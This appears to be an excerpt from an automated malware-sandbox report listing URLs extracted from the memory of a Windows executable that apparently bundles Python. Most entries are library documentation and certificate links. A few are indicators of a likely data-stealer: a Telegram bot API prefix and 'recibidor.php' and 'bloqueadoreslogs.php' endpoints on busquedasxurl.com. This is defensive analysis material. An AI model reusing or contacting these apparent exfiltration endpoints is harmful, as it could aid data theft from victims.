      Source: MkWMm5piE5.exe, 00000002.00000003.1894910395.000001E4C9D34000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9196000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9DCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
      Source: MkWMm5piE5.exe, 00000002.00000003.1895119468.000001E4C9CC0000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9D90000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895322714.000001E4C9CD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
      Source: MkWMm5piE5.exe, 00000002.00000003.1894910395.000001E4C9D34000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
      Source: MkWMm5piE5.exe, 00000002.00000003.1895119468.000001E4C9CC0000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895322714.000001E4C9CD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crln
      Source: MkWMm5piE5.exe, 00000002.00000003.1894910395.000001E4C9D34000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9DCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
      Source: MkWMm5piE5.exe, 00000002.00000003.1894910395.000001E4C9D34000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
      Source: MkWMm5piE5.exe, 00000002.00000003.1894910395.000001E4C9D34000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9196000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9DCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
      Source: powershell.exe, 00000003.00000002.1399688646.000002332495C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 00000003.00000002.1399688646.00000233233D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: MkWMm5piE5.exe, 00000002.00000002.2592502261.000001E4C9880000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
      Source: MkWMm5piE5.exe, 00000002.00000003.1895620190.000001E4C9D62000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9196000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895390615.000001E4C9D5C000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1896118922.000001E4C9D65000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1894910395.000001E4C9D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
      Source: MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
      Source: select.pyd.0.dr, _wmi.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
      Source: MkWMm5piE5.exe, 00000002.00000003.1895659097.000001E4C8C0F000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591474381.000001E4C8BB0000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895119468.000001E4C9CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
      Source: MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895119468.000001E4C9CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
      Source: MkWMm5piE5.exe, 00000002.00000002.2591474381.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895659097.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
      Source: MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rfc-editor.org/info/rfc7253
      Source: MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C93A5000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895240821.000001E4C93A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
      Source: MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
      Source: powershell.exe, 00000003.00000002.1399688646.00000233231A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: MkWMm5piE5.exe, 00000002.00000002.2592677743.000001E4C9A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C8FB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/botz
      Source: MkWMm5piE5.exe, 00000002.00000002.2591721135.000001E4C8EB0000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592183384.000001E4C93B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue44497.
      Source: MkWMm5piE5.exe, 00000002.00000002.2592677743.000001E4C9A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://busquedasxurl.com/login/conexion/bloqueadoreslogs.php?ip=
      Source: MkWMm5piE5.exe, 00000002.00000002.2593414645.000001E4CA5A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://busquedasxurl.com/login/conexion/recibidor.php
      Source: MkWMm5piE5.exe, 00000002.00000002.2593611132.000001E4CA77C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://busquedasxurl.com/login/conexion/recibidor.phpPkw
      Source: MkWMm5piE5.exe, MkWMm5piE5.exe, 00000002.00000002.2596874466.00007FFEDD18D000.00000002.00000001.01000000.00000020.sdmpString found in binary or memory: https://cffi.readthedocs.io/en/latest/using.html#callbacks
      Source: powershell.exe, 00000003.00000002.1418909685.0000023333356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000003.00000002.1418909685.0000023333356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000003.00000002.1418909685.0000023333356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: METADATA.0.drString found in binary or memory: https://cryptography.io
      Source: METADATA.0.drString found in binary or memory: https://cryptography.io/
      Source: METADATA.0.drString found in binary or memory: https://cryptography.io/en/latest/changelog/
      Source: MkWMm5piE5.exe, 00000002.00000002.2595739361.00007FFEDCA03000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-file
      Source: METADATA.0.drString found in binary or memory: https://cryptography.io/en/latest/installation/
      Source: METADATA.0.drString found in binary or memory: https://cryptography.io/en/latest/security/
      Source: MkWMm5piE5.exe, 00000002.00000002.2591474381.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1366935243.000001E4C8D1B000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895659097.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1367667918.000001E4C8D1B000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1369155370.000001E4C8CB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C923C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
      Source: MkWMm5piE5.exe, 00000002.00000002.2593332295.000001E4CA480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/socket.html#socket.socket.connect_ex
      Source: MkWMm5piE5.exe, 00000002.00000002.2593244790.000001E4CA380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
      Source: MkWMm5piE5.exe, 00000002.00000002.2593244790.000001E4CA380000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592255274.000001E4C94B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
      Source: MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
      Source: powershell.exe, 00000003.00000002.1399688646.00000233233D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C8770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
      Source: MkWMm5piE5.exe, 00000002.00000002.2592255274.000001E4C94B0000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592574533.000001E4C9980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
      Source: MkWMm5piE5.exe, MkWMm5piE5.exe, 00000002.00000002.2597001843.00007FFEDD1D1000.00000002.00000001.01000000.0000001D.sdmp, MkWMm5piE5.exe, 00000002.00000002.2597088127.00007FFEDD1FE000.00000002.00000001.01000000.0000001C.sdmp, win32api.pyd.0.dr, pywintypes312.dll.0.drString found in binary or memory: https://github.com/mhammond/pywin32
      Source: MkWMm5piE5.exe, 00000002.00000002.2592677743.000001E4C9A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/platformdirs/platformdirs
      Source: METADATA.0.drString found in binary or memory: https://github.com/pyca/cryptography
      Source: METADATA.0.drString found in binary or memory: https://github.com/pyca/cryptography/
      Source: METADATA.0.drString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
      Source: METADATA.0.drString found in binary or memory: https://github.com/pyca/cryptography/issues
      Source: MkWMm5piE5.exe, 00000002.00000002.2595739361.00007FFEDCA03000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues/8996
      Source: METADATA.0.drString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
      Source: MkWMm5piE5.exe, 00000002.00000002.2592255274.000001E4C94B0000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1368496921.000001E4C8C65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
      Source: MkWMm5piE5.exe, 00000002.00000002.2592183384.000001E4C93B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
      Source: MkWMm5piE5.exe, 00000002.00000002.2591392037.000001E4C8AB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
      Source: MkWMm5piE5.exe, 00000002.00000002.2591032403.000001E4C863C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
      Source: MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C8770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
      Source: MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C8770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
      Source: MkWMm5piE5.exe, 00000002.00000002.2591474381.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1366935243.000001E4C8D1B000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1366140279.000001E4C8D3B000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895659097.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1365206940.000001E4C8D3C000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1365438520.000001E4C8D20000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1367667918.000001E4C8D1B000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1369155370.000001E4C8CB8000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1365279258.000001E4C8D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
      Source: MkWMm5piE5.exe, 00000002.00000002.2592183384.000001E4C93B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues/396
      Source: MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C8770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
      Source: MkWMm5piE5.exe, 00000002.00000002.2593244790.000001E4CA380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
      Source: MkWMm5piE5.exe, 00000002.00000002.2593244790.000001E4CA380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
      Source: powershell.exe, 00000003.00000002.1399688646.0000023323DD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C87BC000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9B80000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9196000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895240821.000001E4C936D000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C923C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9196000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895240821.000001E4C936D000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C923C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C923C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
      Source: MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
      Source: MkWMm5piE5.exe, 00000002.00000002.2593414645.000001E4CA5A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
      Source: MkWMm5piE5.exe, 00000002.00000002.2593831554.000001E4CA8E4000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592677743.000001E4C9A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
      Source: MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895240821.000001E4C936D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
      Source: METADATA.0.drString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
      Source: MkWMm5piE5.exe, 00000002.00000003.1365438520.000001E4C8D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.V
      Source: MkWMm5piE5.exe, 00000002.00000002.2591721135.000001E4C8EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
      Source: MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C87BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
      Source: MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895240821.000001E4C936D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
      Source: METADATA.0.drString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
      Source: powershell.exe, 00000003.00000002.1418909685.0000023333214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1399688646.0000023324A97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1418909685.0000023333356000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
      Source: powershell.exe, 00000003.00000002.1399688646.000002332495C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
      Source: powershell.exe, 00000003.00000002.1399688646.000002332495C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
      Source: MkWMm5piE5.exe, 00000002.00000002.2592327378.000001E4C95B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/guides/packaging-namespace-packages/.
      Source: MkWMm5piE5.exe, 00000002.00000002.2592399511.000001E4C96B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/
      Source: MkWMm5piE5.exe, 00000002.00000002.2591474381.000001E4C8BB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/declaring-project-metadata/
      Source: MkWMm5piE5.exe, 00000002.00000002.2592327378.000001E4C95B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/
      Source: MkWMm5piE5.exe, 00000002.00000002.2591721135.000001E4C8EB0000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592183384.000001E4C93B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
      Source: MkWMm5piE5.exe, 00000002.00000002.2591721135.000001E4C8EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
      Source: MkWMm5piE5.exe, 00000002.00000002.2597267062.00007FFEDD613000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
      Source: MkWMm5piE5.exe, 00000002.00000002.2592399511.000001E4C96B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0685/
      Source: MkWMm5piE5.exe, 00000002.00000002.2592255274.000001E4C94B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/build/).
      Source: METADATA.0.drString found in binary or memory: https://pypi.org/project/cryptography/
      Source: METADATA.0.drString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
      Source: MkWMm5piE5.exe, 00000002.00000002.2593244790.000001E4CA380000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592255274.000001E4C94B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
      Source: MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895240821.000001E4C936D000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2593414645.000001E4CA5A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
      Source: MkWMm5piE5.exe, 00000002.00000002.2593414645.000001E4CA5A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.ioe
      Source: MkWMm5piE5.exe, 00000002.00000002.2592327378.000001E4C95B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/
      Source: MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
      Source: MkWMm5piE5.exe, 00000002.00000002.2592677743.000001E4C9A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
      Source: MkWMm5piE5.exe, 00000002.00000002.2591474381.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895659097.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
      Source: MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C87BC000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C8770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
      Source: MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
      Source: MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C87BC000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
      Source: MkWMm5piE5.exe, 00000002.00000002.2592183384.000001E4C93B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://upload.pypi.org/legacy/
      Source: MkWMm5piE5.exe, 00000002.00000002.2593332295.000001E4CA480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
      Source: MkWMm5piE5.exe, 00000002.00000002.2593332295.000001E4CA480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C923C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C923C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
      Source: MkWMm5piE5.exe, 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmp, MkWMm5piE5.exe, 00000002.00000002.2598741399.00007FFEDDE63000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.openssl.org/H
      Source: MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895240821.000001E4C936D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
      Source: MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895240821.000001E4C936D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
      Source: MkWMm5piE5.exe, 00000002.00000002.2591032403.000001E4C85C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
      Source: MkWMm5piE5.exe, 00000002.00000002.2597584934.00007FFEDD78B000.00000008.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/
      Source: MkWMm5piE5.exe, 00000002.00000002.2597267062.00007FFEDD613000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/)
      Source: MkWMm5piE5.exe, 00000002.00000003.1895031548.000001E4C9D7C000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591474381.000001E4C8BB0000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1894910395.000001E4C9D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
      Source: MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
      Source: MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9196000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895240821.000001E4C936D000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C923C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDE63700_2_00007FF7FBDE6370
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDE72BC0_2_00007FF7FBDE72BC
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDC79500_2_00007FF7FBDC7950
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD7C980_2_00007FF7FBDD7C98
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDDE4B00_2_00007FF7FBDDE4B0
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDD1C900_2_00007FF7FBDD1C90
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDDA4300_2_00007FF7FBDDA430
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDDEB300_2_00007FF7FBDDEB30
